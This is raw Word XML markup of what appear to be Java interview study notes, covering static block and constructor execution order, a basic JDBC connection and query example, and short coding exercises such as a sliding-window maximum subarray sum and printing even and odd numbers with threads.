    <w:p w14:paraId="1ECBFFAB"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131C1193"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36DAEEB3"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fter the Base constructor, the Child constructor is executed, printing:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="080408A5"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DCC5D96"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Final Output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="442F0D7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nal output of the program will be:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C23B2F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6095A4C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Static</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67DFCB4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0F8619D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269B2088"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283BD4C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A5F9CAF"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Detailed Explanation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="610AA1B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tatic Blocks:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FEBCA64"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in classes are executed once when the class is loaded. Since the Base class is loaded first (due to inheritance in Child), the Base static block executes first, followed by the Child static block.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43C04C6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Calls:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="433FB87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When an object is created, the constructor of the parent class (Base) is called first. After that, the constructor of the child class (Child) is called. This happens for both object creations (child1 and child2).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E93F3F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No Static Blocks in Constructor:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D03ED15"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are executed only once, during class loading, not during object creation. Therefore, the static blocks in Base and Child execute only once, at the start of the program, while the constructors execute each time a new object is created.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C3017E0" w14:textId="2E8A3E71" w:rsidR="000133E9" w:rsidRPr="00EC1219" w:rsidRDefault="00000000" w:rsidP="000133E9">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48B3A33D">
          <v:rect id="_x0000_i1893" style="width:0;height:1.5pt" o:hralign="center" o:bullet="t" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="04D0D055" w14:textId="77777777" w:rsidR="00A4327D" w:rsidRDefault="00A4327D" w:rsidP="00F851C0">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2DBFE842" w14:textId="77777777" w:rsidR="00A4327D" w:rsidRPr="00F851C0" w:rsidRDefault="00A4327D" w:rsidP="00F851C0">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A04066C" w14:textId="77777777" w:rsidR="00F851C0" w:rsidRPr="00F851C0" w:rsidRDefault="00F851C0" w:rsidP="00F851C0">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0CAFA067" w14:textId="14EEF8A6" w:rsidR="008A25EB" w:rsidRPr="00CE4B95" w:rsidRDefault="008A25EB" w:rsidP="003E4B77">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095B76FE" w14:textId="31412CBD" w:rsidR="00C24B91" w:rsidRPr="00CE4B95" w:rsidRDefault="00C24B91" w:rsidP="00C24B91">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7030A0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="322" w:name="_Toc197867536"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7030A0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>JDBC</w:t>
      </w:r>
      <w:bookmarkEnd w:id="322"/>
    </w:p>
    <w:p w14:paraId="2AD6346B" w14:textId="77777777" w:rsidR="0041174E" w:rsidRPr="00CE4B95" w:rsidRDefault="0041174E" w:rsidP="0041174E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="323" w:name="_Toc197867537"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is JDBC?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="323"/>
    </w:p>
    <w:p w14:paraId="59BC5AFA" w14:textId="523EE335" w:rsidR="009544C3" w:rsidRPr="00EC1219" w:rsidRDefault="009544C3"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Java Database Connectivity)</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC1219">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is an API (Application Programming Interface) in Java that allows Java applications to interact with databases in a </w:t>
      </w:r>
      <w:r w:rsidRPr="00EC1219">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>standard and database-independent</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC1219">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> way.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29FB0A3B"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AF6140">
          <v:rect id="_x0000_i1894" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EC4320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 JDBC?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67BF2F8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o perform:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C8EF562"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with a database (like MySQL, Oracle, PostgreSQL, etc.)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="036871F1"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ing SQL queries (SELECT, INSERT, UPDATE, DELETE)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58E7ED03"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trieving and processing results</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="547C6A59"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32AAF2">
          <v:rect id="_x0000_i1895" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4408C581"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JDBC Architecture</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F8DB24B"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API (Application layer)</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC1219">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t>Interfaces like Connection, Statement, ResultSet, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19FDA537"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Driver (Database layer)</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC1219">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t>Provided by database vendors to connect Java app to a specific DB.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32B7EAC6"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4BF76">
          <v:rect id="_x0000_i1896" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="54B685D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e JDBC Steps</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7938A599"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forName("com.mysql.cj.jdbc.Driver"); // Load driver</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D35D6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con = DriverManager.getConnection("jdbc:mysql://localhost:3306/db", "user", "pass");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="656EA54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 stmt = con.createStatement();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60C669C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 rs = stmt.executeQuery("SELECT * FROM employees");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36D5F0B5" w14:textId="77777777" w:rsidR="009544C3" w:rsidRPr="00EC1219" w:rsidRDefault="009544C3" w:rsidP="00EC1219">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="488026A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hile(rs.next()) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="775862E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    System.out.println(rs.getString("name"));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14D84B7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48D493D0" w14:textId="77777777" w:rsidR="009544C3" w:rsidRPr="00EC1219" w:rsidRDefault="009544C3" w:rsidP="00EC1219">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E375C2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close();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CD6B927"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C1D887">
          <v:rect id="_x0000_i1897" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6489F278"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117"/>
      </w:tblGrid>
      <w:tr w:rsidR="00EC1219" w:rsidRPr="00EC1219" w14:paraId="009A3DAB" w14:textId="77777777" w:rsidTr="009544C3">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1B27D59D"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nterface</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="623AB0B7"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Purpose</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EC1219" w:rsidRPr="00EC1219" w14:paraId="346D1A8A" w14:textId="77777777" w:rsidTr="009544C3">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="383C6CC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Driver</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0126468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rface for database drivers</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EC1219" w:rsidRPr="00EC1219" w14:paraId="2FE5B09A" w14:textId="77777777" w:rsidTr="009544C3">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="589FE40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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="08FB6887"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nages connection to the database</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EC1219" w:rsidRPr="00EC1219" w14:paraId="6353F42D" w14:textId="77777777" w:rsidTr="009544C3">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="19B4C83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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="47715EF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SQL queries</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EC1219" w:rsidRPr="00EC1219" w14:paraId="513F9F08" w14:textId="77777777" w:rsidTr="009544C3">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="26CB5E22"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PreparedStatement</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="62E6F486"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precompiled parameterized queries</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EC1219" w:rsidRPr="00EC1219" w14:paraId="3D4A520F" w14:textId="77777777" w:rsidTr="009544C3">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="10C4D4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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6A14DC0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lds results from SELECT query</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3EB3E082" w14:textId="1C2CA552" w:rsidR="008E5BE6" w:rsidRPr="00CE4B95"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98" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
      <w:r w:rsidR="0041174E" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2691F494" w14:textId="77777777" w:rsidR="00022774" w:rsidRPr="00CE4B95" w:rsidRDefault="00022774" w:rsidP="00022774">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="324" w:name="_Toc197867538"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Java Programs</w:t>
      </w:r>
      <w:bookmarkEnd w:id="324"/>
    </w:p>
    <w:p w14:paraId="3AEFC12B" w14:textId="77777777" w:rsidR="00022774" w:rsidRPr="00CE4B95" w:rsidRDefault="00022774">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="60519201" w14:textId="0F648A98" w:rsidR="00927923" w:rsidRPr="00CE4B95" w:rsidRDefault="00927923">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="325" w:name="_Toc197867539"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Program</w:t>
      </w:r>
      <w:r w:rsidR="00665316" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Find max sum of contiguous sub array</w:t>
      </w:r>
      <w:bookmarkEnd w:id="325"/>
    </w:p>
    <w:p w14:paraId="16BF2A15" w14:textId="31CB5390"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 program in java to return max sum of contiguous subarray of size 3? </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B41FD4B" w14:textId="3D9EF8E4"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lgorithm steps as well) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CB6C420" w14:textId="108B4E28" w:rsidR="00F30BB4" w:rsidRPr="00CE4B95" w:rsidRDefault="00F30BB4" w:rsidP="00927923">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Example. [2,1,5,1,3,2], where k=3 (max size of sub array)?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A8EAF0E" w14:textId="5823BCB8" w:rsidR="00F30BB4" w:rsidRPr="00CE4B95"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SumSubarra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5754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19E3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dge case: if array length is less than k</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66600B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951F2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valid case, can't have a subarray of size k</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CDA14A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574EE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7B57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culate sum of first window of size k</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33E04F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F45D4E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595A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724C266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A105C"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029C9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e maxSum with the sum of the first window</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D3F5B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ADB712"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lide the window across the array</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D550D9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F77B2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btract the element that is leaving the window and add the one entering the window</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B3D49F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294B295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maxSum if the new window sum is greater</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="437D468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p>
    <w:p w14:paraId="38072F5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FD9F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9F63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Sum</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="677807E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D50EC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A4AF8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EF841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array</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79AB95A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ze of the subarray</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="469A5C4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D2D37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7506E3C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maximum sum of a contiguous subarray of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245E276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F149A" w14:textId="1B21169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C64E8" w14:textId="77777777" w:rsidR="00795A59" w:rsidRPr="00CE4B95" w:rsidRDefault="00795A59" w:rsidP="00795A59">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3BED3A18" w14:textId="3BC0AB59" w:rsidR="00B72394" w:rsidRPr="00CE4B95" w:rsidRDefault="00B72394" w:rsidP="0074241D">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="326" w:name="_Toc197867540"/>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EC15B9"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Print even and odd numbers using thread</w:t>
      </w:r>
      <w:bookmarkEnd w:id="326"/>
    </w:p>
    <w:p w14:paraId="16DA8469" w14:textId="3A6EB9C3" w:rsidR="00B72394" w:rsidRPr="00CE4B95"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638E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6A0C23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5048885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09A30D7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48F10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3DF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78BDAD2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8069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1261E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O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346A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F9EC5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ED0C5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FE4E2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d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809EA8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2F769F7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74CFBBF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E87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244B2"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5D2393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A5AB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75A7B10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ED4A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1ABD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D948E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E361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FE9D8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ECFC5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Ev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9A2C7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A993C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7D1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DE86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1FD9B8B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E9149F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26CF1C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7D061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F9DE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C3AC42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83B5F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68E91F4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27A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0377A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12A0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FD5D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AFB7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27CADD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26B74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1D6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AAB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prin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 max here</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49D83B4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66AB8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odd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Odd</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08CEE4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even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ven</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04307F1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882A8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odd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29D5994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even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0266E1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19686" w14:textId="51FFCCE6"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61E658B2" w14:textId="404DA01B" w:rsidR="00D74910" w:rsidRPr="00CE4B95" w:rsidRDefault="00D74910">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="327" w:name="_Toc197867541"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Program</w:t>
      </w:r>
      <w:r w:rsidR="00304887" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Find maximum value from integer array</w:t>
      </w:r>
      <w:bookmarkEnd w:id="327"/>
    </w:p>
    <w:p w14:paraId="373A6AA8" w14:textId="571A7C6E" w:rsidR="00F66346" w:rsidRPr="00CE4B95" w:rsidRDefault="00F66346" w:rsidP="00F66346">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Write a method to return the maximum value from an integer array passed as an input parameter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F603C6C" w14:textId="3D05FC62" w:rsidR="00D74910" w:rsidRPr="00CE4B95"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dLargestNumber</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ABE8DAD"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4E127E" w14:textId="71548D8D"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 xml:space="preserve">    </w:t>
      </w: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p>
    <w:p w14:paraId="5D285426" w14:textId="53C7443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F31109D" w14:textId="620875B0"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48575CEF" w14:textId="50EA47A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A950714" w14:textId="22CC821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23D6455" w14:textId="71439FB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r w:rsidR="00A70B1A" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="283ED118" w14:textId="06277F3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CE852C0" w14:textId="5FD05EB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return</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p>
    <w:p w14:paraId="47BB38BC" w14:textId="072370C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r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="747C6BD8" w14:textId="75A9BB2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4423EB8" w14:textId="0B7EEBD2"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5C6CFF6B" w14:textId="163664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lastRenderedPageBreak/>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8</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>};</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C8F9F42" w14:textId="356775D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rgest number in given array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CDD9CB1" w14:textId="5D210A8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719DD4C" w14:textId="5C6EC06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DB25B3" w14:textId="77777777" w:rsidR="00022774" w:rsidRPr="00CE4B95" w:rsidRDefault="00022774">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C34FAA4" w14:textId="55B2B7E1" w:rsidR="00E56884" w:rsidRPr="00CE4B95" w:rsidRDefault="00E56884">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
